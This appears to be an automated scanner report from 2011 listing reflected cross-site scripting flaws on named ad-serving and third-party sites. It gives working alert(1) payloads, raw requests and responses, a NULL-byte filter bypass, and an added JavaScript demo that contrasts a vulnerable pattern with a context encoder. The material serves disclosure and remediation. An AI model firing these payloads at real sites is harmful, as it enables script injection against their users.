HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 01-Sep-2011 17:55:11 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=6422714091563403120; path=/; expires=Tue, 29-Nov-2011 17:55:11 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb14588=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=ChIIzagDEAoYCCAIKAgw_er58gQKEgjAqQMQChgRIBEoETD_6vnyBBD_6vnyBBgY; path=/; expires=Tue, 29-Nov-2011 17:55:11 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb210431=lbMRZkI/7Zw@!%#Qz[m]b91JX?enc=Z2ZmZmZm-j9OYhBYObT2PwAAAAAAAPg_TmIQWDm09j9mZmZmZmb6P9-RjzZyG0FacEeI8W8QIll_dV5OAAAAADgbCADcAwAAZAAAAAIAAAC2awgANCcBAAEAAABVU0QAVVNEANgCWgA7JQAAnhQBAgUCAQUAAAAAYh7Y6wAAAAA.&tt_code=ns.informit&udj=uf%28%27a%27%2C+27%2C+1314813311%29%3Buf%28%27g%27%2C+1079%2C+1314813311%29%3Buf%28%27r%27%2C+551862%2C+1314813311%29%3Bppv%2882%2C+%276503509514255307231%27%2C+1314813311%2C+1325181311%2C+66647%2C+75572%29%3Bppv%2884%2C+%276503509514255307231%27%2C+1314813311%2C+1325181311%2C+66647%2C+75572%29%3Bppv%2811%2C+%276503509514255307231%27%2C+1314813311%2C+1325181311%2C+66647%2C+75572%29%3Bppv%2882%2C+%276503509514255307231%27%2C+1314813311%2C+1325181311%2C+66647%2C+75572%29%3Bppv%2884%2C+%276503509514255307231%27%2C+1314813311%2C+1325181311%2C+66647%2C+75572%29%3B&cnd=!ByLNcwjXiAQQttchGAAgtM4EMAE4u0pAAEhkULi2IFgAYHhoAHAAeACAAQCIAQCQAQGYAQGgAQKoAQOwAQC5AWdmZmZmZvo_wQFnZmZmZmb6P8kBmpmZmZmZ8T_ZAQAAAAAAAPA_4AHhHQ..&ccd=!6AQyKAjXiAQQttchGLTOBCAA&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E66647&media_subtypes=1; path=/; expires=Thu, 01-Sep-2011 17:55:11 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip4FV-GK]#_gAU+]VCVUo?#tv8d''iQ#; path=/; expires=Tue, 29-Nov-2011 17:55:11 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Wed, 31 Aug 2011 17:55:11 GMT Content-Length: 329
The value of the imp_rvr_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2c8a"%3balert(1)//155cfbc0af0 was submitted in the imp_rvr_id parameter. This input was echoed as b2c8a";alert(1)//155cfbc0af0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4056"%3balert(1)//963aa907825 was submitted in the mpck parameter. This input was echoed as d4056";alert(1)//963aa907825 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
document.write( " <div id=\"foldcheck254966832407\">" ); var rvr_id=254966832407; var mpserv; var mpi="img-cdn.mediaplex.com/0/";
...[SNIP]... U38=9&ir_DAP_U31=u&ir_DAP_U26=true&ir_DAP_U25=false&ir_DAP_U24=false&ir_DAP_U33=4&ir_DAP_I105=0&ir_DAP_U34=1&ir_DAP_U32=C&ir_DAP_I106=0&ir_DAP_U35=02018-0250&rvr_id=254966832407&imp_rvr_id=254966832407d4056";alert(1)//963aa907825"; var mpcke="<mpcke/> ...[SNIP]...
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b198d"%3balert(1)//6c031280ac6 was submitted in the mpvc parameter. This input was echoed as b198d";alert(1)//6c031280ac6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
document.write( " <div id=\"foldcheck254966832407\">" ); var rvr_id=254966832407; var mpserv; var mpi="img-cdn.mediaplex.com/0/";
...[SNIP]... advertising.com%2Fclick%2Fsite%3D0000805764%2Fmnum%3D0001017406%2Fcstr%3D2758506%3D_4e445926%2C6612185646%2C805764%5E1017406%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D2758506%2Foptn%3D64%3Ftrg%3Db198d";alert(1)//6c031280ac6"; var bangmpvc="http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAHF4m-jACh18-HCZRD1jHzErWUROAAAAAJVwCABkAAAAZAAAAAIAAADkaggAh7wAAAEAAABVU0QAVVNE ...[SNIP]...
The value of the imp_rvr_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 976a0"%3balert(1)//3e2ec7b7f61 was submitted in the imp_rvr_id parameter. This input was echoed as 976a0";alert(1)//3e2ec7b7f61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e81ae"%3balert(1)//c6ff7eee9a1 was submitted in the mpck parameter. This input was echoed as e81ae";alert(1)//c6ff7eee9a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
document.write( " <div id=\"foldcheck254960678256\">" ); var rvr_id=254960678256; var mpserv; var mpi="img-cdn.mediaplex.com/0/";
...[SNIP]... U38=9&ir_DAP_U31=u&ir_DAP_U26=true&ir_DAP_U25=false&ir_DAP_U24=false&ir_DAP_U33=4&ir_DAP_I105=0&ir_DAP_U34=1&ir_DAP_U32=C&ir_DAP_I106=0&ir_DAP_U35=02018-0250&rvr_id=254960678256&imp_rvr_id=254960678256e81ae";alert(1)//c6ff7eee9a1"; var mpcke="<mpcke/> ...[SNIP]...
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bee9"%3balert(1)//4c140ba25e9 was submitted in the mpvc parameter. This input was echoed as 1bee9";alert(1)//4c140ba25e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
document.write( " <div id=\"foldcheck254960678256\">" ); var rvr_id=254960678256; var mpserv; var mpi="img-cdn.mediaplex.com/0/";
...[SNIP]... vertising.com%2Fclick%2Fsite%3D0000805760%2Fmnum%3D0001017409%2Fcstr%3D14709292%3D_4e4459f6%2C8352185012%2C805760%5E1017409%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D14709292%2Foptn%3D64%3Ftrg%3D1bee9";alert(1)//4c140ba25e9"; var bangmpvc="http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANOgYEy-_0Bo-HCZRD1jHzH2WUROAAAAAItwCABkAAAAZAAAAAIAAACdaggAh7wAAAEAAABVU0QAVVNE ...[SNIP]...
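Every finding above reflects a parameter into a JavaScript string literal, and the payloads show the two break-out shapes the scanner used: "-alert(1)-" closes the literal and turns the statement into an arithmetic expression whose operand is a function call, while ";alert(1)// closes the literal, ends the statement and comments out the remainder of the line (the single-quoted redir case is the same trick with the other quote). The block below is an added example, not code from the scan report or from any of the ad servers it covers. It rebuilds the concatenated tag pattern, evaluates the result the way a victim's browser would with a stub alert(), and sets it beside a version that hex-escapes the value for the JavaScript string context. The names sz, w and renderTag* and the "728" value are assumed for illustration.

```javascript
// Added example, not code from the scan report or from the ad servers it covers.
// It rebuilds the reflected-into-a-JS-string pattern behind the findings above
// (parameter value concatenated into var x = "..." in a text/javascript response)
// and shows why "-alert(1)-" and ";alert(1)// escape the literal, beside an
// encoder for the JavaScript string context that keeps them inside it.
// Function and variable names (sz, w, renderTag*) are assumed for illustration.

// Vulnerable pattern: parameter values are dropped straight into string literals.
function renderTagVulnerable(params, quote = '"') {
  return `var sz = ${quote}${params.sz}${quote};\n` +
         `var w = ${quote}${params.w}${quote};`;
}

// Encoder for the JS string-literal context: everything outside a short
// alphanumeric allow-list becomes \xHH (or \uHHHH above U+00FF). That covers
// both quote characters, backslash, ; and -, and also < and /, so a value
// containing </script> cannot close the enclosing script element either.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9,._]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Hardened pattern: same template, values encoded for the context they land in.
function renderTagSafe(params, quote = '"') {
  return `var sz = ${quote}${encodeForJsString(params.sz)}${quote};\n` +
         `var w = ${quote}${encodeForJsString(params.w)}${quote};`;
}

// Stand-in for the victim's browser evaluating the response: run the generated
// script with a stub alert() that records its calls, and return what sz holds.
function evaluateTag(script) {
  const alerts = [];
  const stubAlert = (v) => { alerts.push(v); return 0; };
  const run = new Function('alert', script + '\nreturn sz;');
  return { alerts, sz: run(stubAlert) };
}

// Demonstration with the three payload shapes seen in the report (values constructed here).
const demoCases = [
  { sz: '4a8ed"-alert(1)-"9ea1d2dfa2b', quote: '"' },   // arithmetic break-out
  { sz: 'b2c8a";alert(1)//155cfbc0af0', quote: '"' },   // statement break-out + comment
  { sz: "fe0a5';alert(1)//ef5e54119c7", quote: "'" },   // same, single-quoted context
];
for (const c of demoCases) {
  const params = { sz: c.sz, w: '728' };
  console.log('vulnerable:', evaluateTag(renderTagVulnerable(params, c.quote)));
  console.log('encoded:   ', evaluateTag(renderTagSafe(params, c.quote)));
}
```

With the vulnerable tag the stub alert() fires once for each payload and sz ends up as NaN (the "-" shape) or the truncated prefix (the ";" shape); with the encoded tag alert() never runs and sz round-trips to the exact input. The allow-list encoder is deliberately stricter than JSON.stringify, which leaves < and / alone and so still lets a value containing </script> terminate the script element. Where the value is only ever meant to be a number or a size such as 728x90, validating it against that format before it is reflected is the simpler fix.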
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c589f'><script>alert(1)</script>a7f2b3d0ba2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/getCommentCounts.phpc589f'><script>alert(1)</script>a7f2b3d0ba2?src=wp-2&acct=212708dd21f0d86d12b845179edd5ef0&ids=&guids=&links=&titles=&authors=&times= HTTP/1.1 Host: intensedebate.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.whatgives.com/donationapp/?ref=pplabs
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Aug 2011 14:09:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=5116184&host=intensedebate.com&back=http://intensedebate.com/js/getCommentCounts.phpc589f'><script>alert(1)</script>a7f2b3d0ba2?src=wp-2&acct=212708dd21f0d86d12b845179edd5ef0&ids=&guids=&links=&titles=&authors=&times='> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 34ef6'><script>alert(1)</script>afd580c60d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/wordpressTemplateLinkWrapper2.php34ef6'><script>alert(1)</script>afd580c60d5?acct=212708dd21f0d86d12b845179edd5ef0 HTTP/1.1
Host: intensedebate.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.whatgives.com/donationapp/?ref=pplabs
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 12 Aug 2011 14:09:41 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=5116184&host=intensedebate.com&back=http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php34ef6'><script>alert(1)</script>afd580c60d5?acct=212708dd21f0d86d12b845179edd5ef0'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e4460'><script>alert(1)</script>e7e12777844 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /remoteVisit.phpe4460'><script>alert(1)</script>e7e12777844?acct=212708dd21f0d86d12b845179edd5ef0&time=1313158224112 HTTP/1.1
Host: intensedebate.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.whatgives.com/donationapp/?ref=pplabs
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 12 Aug 2011 14:10:01 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=5116184&host=intensedebate.com&back=http://intensedebate.com/remoteVisit.phpe4460'><script>alert(1)</script>e7e12777844?acct=212708dd21f0d86d12b845179edd5ef0&time=1313158224112'> ...[SNIP]...
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 419d1'%3balert(1)//c9a64775f57 was submitted in the q parameter. This input was echoed as 419d1';alert(1)//c9a64775f57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rightnow/index.php?tpl=ask&q=xss419d1'%3balert(1)//c9a64775f57 HTTP/1.1
Host: interface.q-go.net
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/company-contact.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:16:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 3769
Connection: close
Content-Type: text/html; charset=iso-8859-15
The value of the cD request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 835e9%3balert(1)//28fba634b62 was submitted in the cD parameter. This input was echoed as 835e9;alert(1)//28fba634b62 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webValidator.aspx?sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=STUDY&cD=835e9%3balert(1)//28fba634b62&rF=False&iType=1&domainname=0 HTTP/1.1
Host: ips-invite.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://go.magento.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE01
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Fri, 12 Aug 2011 13:44:36 GMT
Content-Length: 3026
var sID= '103836'; var sC= 'IPE103836';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= 'STUDY'; var ps='sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=S ...[SNIP]... getLinkerUrl(url, false); } catch(e){ } return url; }var tC= 'IPEt'; var tCv='?'; CCook(tC,tC,0); tCv= GetC(tC);if (GetC(sC)==null && GetC('IPE_S_103836') == null && tCv != null) {CCook(sC,sC,835e9;alert(1)//28fba634b62); Ld();} DCook(tC);function CCook(n,v,d){var exp= ''; var dm = document.domain;if (d) {var dt= new Date();dt.setTime(dt.getTime()+(d*24*60*60*1000));exp='; expires='+dt.toGMTString();}document.cookie= ...[SNIP]...
The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddae3'%3beb11d4767f0 was submitted in the loc parameter. This input was echoed as ddae3';eb11d4767f0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webValidator.aspx?sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=ddae3'%3beb11d4767f0&cD=90&rF=False&iType=1&domainname=0 HTTP/1.1
Host: ips-invite.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://go.magento.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE03
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Fri, 12 Aug 2011 13:42:37 GMT
Content-Length: 3000
var sID= '103836'; var sC= 'IPE103836';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= 'ddae3';eb11d4767f0'; var ps='sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=ddae3%27%3beb11d4767f0&cD=90&rF=False&iType=1&domainname=0';var IPEspeed = 5;var _invite = 'ips-invite'; rn='103836';var s ...[SNIP]...
The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0024e08'-alert(1)-'3fafaf9c842 was submitted in the loc parameter. This input was echoed as 24e08'-alert(1)-'3fafaf9c842 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /webValidator.aspx?sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=STUDY%0024e08'-alert(1)-'3fafaf9c842&cD=90&rF=False&iType=1&domainname=0 HTTP/1.1
Host: ips-invite.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://go.magento.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE03
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Fri, 12 Aug 2011 13:44:23 GMT
Content-Length: 3034
var sID= '103836'; var sC= 'IPE103836';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= 'STUDY.24e08'-alert(1)-'3fafaf9c842'; var ps='sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=STUDY%0024e08%27-alert(1)-%273fafaf9c842&cD=90&rF=False&iType=1&domainname=0';var IPEspeed = 5;var _invite = 'ips-invite'; ...[SNIP]...
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload ed672<script>alert(1)</script>e8459f403c7 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gateway/gw.js?csid=K05540ed672<script>alert(1)</script>e8459f403c7 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload ca568<a>8469a0c1935 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:50:16 GMT
Server: Apache/2.2
Content-Length: 630
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 31 Aug 2011 21:50:16 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=11&NCAT=12841%3A30994%3A&PTYPE=2100&CID=183029&NODE=30994&BRAND=9&CNET-PAGE-GUID=GFS6RAoPOhwAAARvhywAAABI&TAG=Google%2BInc.%3BApple%2BMacintosh%3BApple%2BSafari%3BWeb%2BBrowser%3BGoogle%2BChrome&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=97043431&IREFER_HOST=google.com&ADREQ&beacon=1ca568<a>8469a0c1935&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='1568846901935' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c13-ad-xw3.cnet.com::1399384 ...[SNIP]...
The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6ef3'%3balert(1)//ea97ed25b95 was submitted in the PAGESTATE parameter. This input was echoed as d6ef3';alert(1)//ea97ed25b95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:49:55 GMT
Server: Apache/2.2
Content-Length: 233
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 31 Aug 2011 21:49:55 GMT
/* MAC ad */<!-- no beacon mappings defined -->;window.CBSI_PAGESTATE='d6ef3';alert(1)//ea97ed25b95';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c17-ad-xw6.cnet.com::3033344912 2011.08.31.21.49.55 *//* MAC T 0.0.0.0 */
The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload f685b<a>c254e1d7c3b was submitted in the SITE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:49:56 GMT
Server: Apache/2.2
Content-Length: 674
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 31 Aug 2011 21:49:56 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=11f685b<a>c254e1d7c3b&NCAT=12841%3A30994%3A&PTYPE=2100&CID=183029&NODE=30994&BRAND=9&CNET-PAGE-GUID=GFS6RAoPOhwAAARvhywAAABI&TAG=Google%2BInc.%3BApple%2BMacintosh%3BApple%2BSafari%3BWeb%2BBrowser%3BGoogle%2BChrome&cookiesO ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9959d<img%20src%3da%20onerror%3dalert(1)>686a587fb64 was submitted in the REST URL parameter 1. This input was echoed as 9959d<img src=a onerror=alert(1)>686a587fb64 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /serve.php9959d<img%20src%3da%20onerror%3dalert(1)>686a587fb64?lid=583648&dn=toyhookupinc.com HTTP/1.1
Host: ndparking.com
Proxy-Connection: keep-alive
Referer: http://www.toyhookupinc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
